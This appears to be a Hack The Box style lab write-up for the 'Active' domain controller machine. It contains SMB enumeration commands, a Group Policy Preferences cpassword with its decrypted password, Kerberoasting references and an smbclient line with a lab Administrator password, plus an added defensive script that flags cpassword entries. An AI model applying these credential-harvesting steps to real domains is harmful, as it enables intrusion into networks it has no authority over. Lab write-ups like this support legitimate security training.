Active is an Active Directory box with a Domain Controller installed.


SMB enumeration:

smbclient '\\server\share'
mask ""
recurse ON
prompt OFF
cd 'path\to\remote\dir'
lcd '~/path/to/download/to/'
mget *

The tree below looks like Group Policy Objects.

One of the Group Policy Preferences that was created contains a cpassword.

Groups.xml contains information about a domain service account:
active.htb\SVC_TGS
and the encrypted password:
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

The Kali distro already ships with a script for this:

active.htb\SVC_TGS
Password:
GPPstillStandingStrong2k18
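
A defender-side check for the finding above, as an added example that is not part of the original write-up: it walks a local copy of SYSVOL and reports every XML file that still carries a non-empty cpassword attribute, without printing the value. The account attribute names, the sample tree and the example.local account are assumptions constructed for the demo.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Attribute names assumed to hold the account in GPP files (compared lowercased).
ACCOUNT_ATTRS = ("username", "runas", "accountname")

def find_cpasswords(root_dir):
    """Return one finding per XML element with a non-empty cpassword attribute.
    The cpassword value itself is never returned or printed."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except (ET.ParseError, OSError):
                continue  # malformed or unreadable file: skip it, keep auditing
            for elem in root.iter():
                attrs = {k.lower(): v for k, v in elem.attrib.items()}
                if not attrs.get("cpassword"):
                    continue
                account = next((attrs[a] for a in ACCOUNT_ATTRS if attrs.get(a)), "?")
                findings.append({"file": os.path.relpath(path, root_dir),
                                 "account": account})
    return findings

def demo():
    """Build a constructed SYSVOL-like tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        gpo = os.path.join(tmp, "Policies", "{CONSTRUCTED-GPO-GUID}", "MACHINE",
                           "Preferences", "Groups")
        os.makedirs(gpo)
        samples = {
            # Constructed sample: placeholder cpassword, hypothetical account.
            "Groups.xml": r'<Groups><User name="svc_demo"><Properties action="U" '
                          r'cpassword="CONSTRUCTED-PLACEHOLDER" '
                          r'userName="example.local\svc_demo"/></User></Groups>',
            "Clean.xml": '<Groups><User name="x"><Properties cpassword=""/></User></Groups>',
            "Broken.xml": "<Groups><User",
        }
        for fname, body in samples.items():
            with open(os.path.join(gpo, fname), "w", encoding="utf-8") as fh:
                fh.write(body)
        return find_cpasswords(tmp)

if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}: cpassword present for {f['account']}")
```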






Trying Kerberoasting with the user credentials:
https://room362.com/post/2016/kerberoast-pt1/
https://room362.com/post/2016/kerberoast-pt2/
https://room362.com/post/2016/kerberoast-pt3/



Recursive mapping was quite time-consuming:

smbclient '\\10.129.227.83\Users' -U 'active.htb\Administrator%Ticketmaster1968'

